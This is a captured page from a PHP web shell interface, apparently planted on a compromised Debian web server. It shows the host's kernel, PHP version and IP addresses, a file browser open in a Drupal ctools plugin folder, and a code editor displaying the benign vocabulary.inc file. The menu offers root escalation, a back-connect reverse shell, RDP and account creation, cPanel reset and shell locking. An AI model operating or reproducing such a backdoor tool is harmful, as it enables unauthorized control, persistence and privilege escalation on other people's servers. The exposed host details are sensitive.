Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.218.3.204
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
plugins /
contexts /
[ HOME SHELL ]
Name
Size
Permission
Action
entity.inc
9.04
KB
-rw-r--r--
node.inc
5.21
KB
-rw-r--r--
node_add_form.inc
3.47
KB
-rw-r--r--
node_edit_form.inc
6.04
KB
-rw-r--r--
string.inc
2.36
KB
-rw-r--r--
term.inc
4.78
KB
-rw-r--r--
terms.inc
3.11
KB
-rw-r--r--
token.inc
1.71
KB
-rw-r--r--
user.inc
4.52
KB
-rw-r--r--
user_edit_form.inc
6.02
KB
-rw-r--r--
vocabulary.inc
1.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vocabulary.inc
<?php /** * @file * * Plugin to provide a vocabulary context */ /** * Plugins are described by creating a $plugin array which will be used * by the system that includes this file. */ $plugin = array( 'title' => t("Taxonomy vocabulary"), 'description' => t('A single taxonomy vocabulary object.'), 'context' => 'ctools_context_create_vocabulary', 'edit form' => 'ctools_context_vocabulary_settings_form', 'defaults' => array('vid' => ''), 'keyword' => 'vocabulary', 'context name' => 'vocabulary', // This context is deprecated and should not be usable in the UI. 'no ui' => TRUE, 'no required context ui' => TRUE, 'superceded by' => 'entity:taxonomy_vocabulary', ); /** * It's important to remember that $conf is optional here, because contexts * are not always created from the UI. */ function ctools_context_create_vocabulary($empty, $data = NULL, $conf = FALSE) { $context = new ctools_context('vocabulary'); $context->plugin = 'vocabulary'; if ($empty) { return $context; } if ($conf && isset($data['vid'])) { $data = taxonomy_vocabulary_load($data['vid']); } if (!empty($data)) { $context->data = $data; $context->title = $data->name; $context->argument = $data->vid; return $context; } } function ctools_context_vocabulary_settings_form($form, &$form_state) { $conf = $form_state['conf']; $options = array(); foreach (taxonomy_get_vocabularies() as $vid => $vocabulary) { $options[$vid] = $vocabulary->name; } $form['vid'] = array( '#title' => t('Vocabulary'), '#type' => 'select', '#options' => $options, '#default_value' => $conf['vid'], '#description' => t('Select the vocabulary for this form.'), ); return $form; } function ctools_context_vocabulary_settings_form_submit($form, &$form_state) { $form_state['conf']['vid'] = $form_state['values']['vid']; }
Close